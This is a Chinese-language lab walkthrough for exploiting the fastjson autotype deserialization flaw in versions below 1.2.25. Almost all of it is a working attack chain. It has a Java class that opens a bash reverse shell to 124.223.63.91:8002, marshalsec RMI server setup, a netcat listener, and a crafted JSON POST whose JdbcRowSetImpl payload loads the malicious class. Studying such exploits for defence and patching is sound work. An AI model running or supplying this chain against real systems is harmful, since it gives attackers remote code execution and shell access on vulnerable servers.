目录
编译test.java(命令:javac test.java)
本地服务监听8002端口(8002为test.java中修改的端口)
实验原理
fastjson autotype在处理json对象的时候没有对@type字段进行安全性验证,导致攻击者传入危险类,并调用危险类连接远程主机,通过恶意类执行代码
影响版本
fastjson<1.2.25
下载工具
git clone https: //github.com/mbechler/marshalsec
cd marshalsec
mvn clean package -DskipTests
安装完切换到target目录下新建test.java
(命令:vim test.java-粘贴代码-更改反弹shell的地址和端口)
- import java.lang.Runtime;
-
- import java.lang.Process;
-
-
-
- public class test {
-
- static {
-
- try {
-
- Runtime rt = Runtime.getRuntime();
-
- String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/124.223.63.91/8002 0>&1"};
-
- Process pc = rt.exec(commands);
-
- pc.waitFor();
-
- } catch (Exception e) {
-
- // do nothing
-
- }
-
- }
-
- }
编译test.java(命令:javac test.java)
开启一个http服务,方便加载test.class
python2: python2 -m SimpleHTTPServer
python3: python3 -m http.server
访问124.223.63.91:8000
启动rmi服务监听9999端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://124.223.63.91:8000/#test" 9999
(8000为上一步开启http服务的端口)
本地服务监听8002端口(8002为test.java中修改的端口)
命令:nc -nvlp 8002
构造请求包
- POST / HTTP/1.1
-
- Host: 172.16.181.6:8090
-
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
-
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-
- Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
-
- Accept-Encoding: gzip, deflate
-
- Connection: close
-
- Content-Type:application/json;charset=UTF-8
-
- Upgrade-Insecure-Requests: 1
-
- Content-Length: 157
-
-
-
- {
-
- "b":{
-
- "@type":"com.sun.rowset.JdbcRowSetImpl",
-
- "dataSourceName":"rmi://124.223.63.91:9999/Test",
-
- "autoCommit":true
-
- }
-
- }
查看端口
